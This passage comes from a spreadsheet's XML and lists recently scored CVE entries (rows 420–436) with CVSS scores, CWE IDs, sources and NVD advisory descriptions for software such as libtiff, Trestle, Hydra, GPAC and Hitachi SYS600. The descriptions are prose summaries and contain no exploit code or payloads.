      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52492</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr"/>
      <c r="Q420" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libtiff rgb2ycbcr utility's cvtRaster() function when computing strip buffer sizes can result in an undersized heap allocation and subsequent heap-based buffer overflow during YCbCr conversion of a crafted TIFF image</t>
        </is>
      </c>
      <c r="S420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52492</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54757</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr"/>
      <c r="Q421" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, Trestle is vulnerable to server-side template injection that can lead to remote code execution. This occurs because the MDCleanInclude and MDSectionInclude Jinja2 tags re-parse untrusted Markdown content as template source code using a non-sandboxed jinja2.Environment. An attacker who controls content that Trestle renders, such as a crafted workspace Markdown file, a third-party SSP document, or a YAML lookup-table value, can inject a Jinja2 expression that traverses Python object internals to execute arbitrary operating system commands in the context of the Trestle process. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="S421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54757</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57170</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F422" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a Python SDK and command-line tool for managing OSCAL compliance documents. In versions prior to 3.12.4 and 4.0.0 through 4.0.3, the custom Jinja2 include tags mdsection_include and md_clean_include re-parse the content of an included Markdown file as Jinja2 template code in a non-sandboxed environment, allowing server-side template injection that can lead to arbitrary code execution. The MDSectionInclude and MDCleanInclude tags in Trestle/core/jinja/tags.py pass included file content to Parser(self.environment, ...).parse(), splicing it into the host template's compilation, and the environment is a plain jinja2.Environment rather than a SandboxedEnvironment, so any expressions in the file are evaluated with full access to the usual SSTI gadget chain. Because Trestle's Markdown writers emit OSCAL prose and component-description fields verbatim, applying delimiter neutralization only to parameter tables, attacker-controlled OSCAL data such as a control statement, part prose, or component description containing Jinja2 syntax flows into an included Markdown file and is executed when the include tag re-parses it. This issue is fixed in version 4.1.0.</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57170</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68508</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>Hydra is a framework for elegantly configuring complex applications. Prior to 1.3.4, hydra.utils.instantiate() resolves and calls Python objects selected by configuration through _resolve_target() in hydra/_internal/instantiate/_instantiate2.py, allowing attacker-controlled target values and arguments to choose dangerous callables. A consuming application, library, CLI workflow, or model loader that passes untrusted configuration, CLI overrides, or model metadata into hydra.utils.instantiate() can therefore execute arbitrary code in its own process, including reading or modifying files and credentials or terminating the process. Version 1.3.4 adds target blocking with an explicit HYDRA_INSTANTIATE_ALLOWLIST_OVERRIDE escape hatch. This issue is fixed in version 1.3.4.</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68508</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71382</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr"/>
      <c r="K424" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71382</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71613</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr"/>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the j2kdec_process() function. Fixed in 9a253a07fd3f6b48022bba74302bf39388dda859.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71613</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78136</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-08-23</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>chirpmyradio CHIRP before 39178db allows eval injection via crafted CSV data. This occurs in _clean_tmode in drivers/kenwood_itm.py.</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78136</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78482</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R427"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S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78482</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78484</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R428"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S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78484</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78493</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R429"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S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78493</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86504</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing project-trust confirmation before building a Dev Container allowed host-level code execution</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86504</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9852</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>A CSV injection vulnerability exists in SYS600. Injected malicious formulas can add or modify data to the spreadsheet, insert links, exfiltrate data, and in some cases, depending on how the user has their environment configured, execute malicious code on the user’s machine. To exploit this issue attackers would need a way to create arbitrary log messages. This could be achieved through normal functionality via SCIL scripts, a log injection vulnerability, or via the SYS600 broker. This vulnerability affects all Windows users regardless of their privilege level who can run the Notify service and export the log.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9852</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9853</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 which allows any user authenticated to the operating system of the server hosting the application to read and modify application objects without being authenticated to the SYS600 system itself.
Only the SYS600 system users should be permitted to view and modify application objects.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9853</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9854</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>hitachienergy:microscada_x_sys600</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in SYS600 RBAC mechanism where users having access to the engineering tools could elevate their privileges to administrator level on the underlying Windows host, granting themselves full control over the host machine.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9854</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15140</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>psirt@purestorage.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>A privilege-escalation issue in the Portworx Operator when deployed on Red Hat OpenShift (OCP). Only under specific conditions during the initial provisioning of a Portworx storage cluster, a user holding only limited, namespace-scoped permissions could cause the operator to grant broader access than intended, potentially resulting in elevated privileges within the Kubernetes cluster.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15140</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15913</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>df4dee71-de3a-4139-9588-11b62fe6c0ff</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>In versions prior to 7.10.2 a path traversal vulnerability in the /attachRemoteFiles endpoint of Fortra's GoAnywhere MFT allows Web Users with both Secure Folders and Secure Mail permissions to escape their sandboxed home directory, achieving arbitrary file read.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15913</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34948</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, only classes present in the SELECT clause are protected by the silos access check in OQL. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34948</t>
        </is>
      </c>
    </row>
    <row r="437">
